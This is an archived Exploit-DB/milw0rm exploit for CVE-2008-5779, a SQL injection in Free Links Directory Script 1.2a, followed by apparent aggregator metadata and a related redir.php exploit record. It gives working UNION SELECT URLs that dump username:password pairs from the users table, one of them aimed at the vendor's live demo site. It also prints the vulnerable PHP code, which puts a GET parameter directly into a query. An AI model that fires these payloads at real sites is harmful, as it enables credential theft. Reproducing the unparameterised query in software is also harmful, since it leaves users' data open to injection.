#Free Links Directory Script (id) SQL Injection Vulnerability
#Author: nuclear
#site:
http://flds-script.com
#vuln:
http://localhost/[path]/lpro.php?id=-1 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11 from users
#demo:
http://flds-script.com/demo/lpro.php?id=-1%20UNION%20SELECT%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11%20from%20users
#notes:
Script is full of bugs like this, too bored to catch em all !
#greetz Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r, Whitestar
# milw0rm.com [2008-12-15]
{"hash": "e5e10e1d25ac459a8b78639f1ec77fac4fdcbdd89c8aa708e837646952ff6545", "id": "EDB-ID:7474", "lastseen": "2016-02-01T03:19:00", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "bulletinFamily": "exploit", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/7474/", "description": "FLDS 1.2a (lpro.php id) Remote SQL Injection Vulnerability. CVE-2008-5779. Webapps exploit for php platform", "title": "FLDS 1.2a lpro.php id Remote SQL Injection Vulnerability", "sourceData": "#Free Links Directory Script (id) SQL Injection Vulnerability\n\n\n#Author: nuclear\n\n\n#site:\nhttp://flds-script.com\n\n\n#vuln:\nhttp://localhost/[path]/lpro.php?id=-1 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11 from users\n\n\n#demo:\nhttp://flds-script.com/demo/lpro.php?id=-1%20UNION%20SELECT%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11%20from%20users\n\n#notes:\nScript is full of bugs like this, too bored to catch em all !\n\n\n#greetz Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r, Whitestar\n\n# milw0rm.com [2008-12-15]\n", "objectVersion": "1.0", "cvelist": ["CVE-2008-5779"], "published": "2008-12-15T00:00:00", "osvdbidlist": ["50723"], "references": [], "reporter": "nuclear", "modified": "2008-12-15T00:00:00", "href": "https://www.exploit-db.com/exploits/7474/", "viewCount": 2}
{"cve": [{"lastseen": "2017-09-29T14:26:16", "references": ["https://www.exploit-db.com/exploits/7474", "http://www.securityfocus.com/bid/32835", "http://securityreason.com/securityalert/4849"], "description": "SQL injection vulnerability in lpro.php in Free Links Directory Script (FLDS) 1.2a allows remote attackers to execute arbitrary SQL commands via the id parameter.", "edition": 2, "reporter": "NVD", "published": "2008-12-30T15:30:01", "title": "CVE-2008-5779", "type": "cve", "enchantments": {"score": {"modified": "2017-09-29T14:26:16", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2008-5779"], "scanner": [], "modified": "2017-09-28T21:32:48", "cpe": ["cpe:/a:flds_script:flds:1.2a"], "id": "CVE-2008-5779", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5779", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-01T02:15:31", "osvdbidlist": ["50723", "50722", "50724"], "references": [], "edition": 1, "description": "FLDS 1.2a (redir.php id) Remote SQL Injection Vulnerability. CVE-2008-5778,CVE-2008-5779,CVE-2008-5928. Webapps exploit for php platform", "reporter": "nuclear", "published": "2008-12-14T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "FLDS 1.2a redir.php id Remote SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5779", "CVE-2008-5928", "CVE-2008-5778"], "modified": "2008-12-14T00:00:00", "id": "EDB-ID:7453", "href": "https://www.exploit-db.com/exploits/7453/", "sourceData": "#Free Links Directory Script (id) SQL Injection Vulnerability\n\n\n#Author: nuclear\n\n\n#site:\nhttp://flds-script.com\n\n\n#vuln:\nhttp://localhost/[path]/redir.php?id=-1%20UNION%20SELECT%201,2,@@version,4,5,6,7,8,9,10,11/*\n\n\n#vulnerable code:\n$ida = $_GET['id'];\n$link = mysql_fetch_array(mysql_query(\"select * from links where id=$ida\"));\n$idcheck = mysql_numrows(mysql_query(\"select * from links where id=$ida\"));\n\n\n#demo:\nhttp://flds-script.com/demo/redir.php?id=-1 UNION SELECT 1,2,@@version,4,5,6,7,8,9,10,11\n\n#notes:\nthe injection does not work if trying to comment out the rest of the query.The result page will be a 404 but\nyou can get the data of the injection in the url\n\n\n#greetz Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r, Whitestar\n\n# milw0rm.com [2008-12-14]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/7453/"}]}
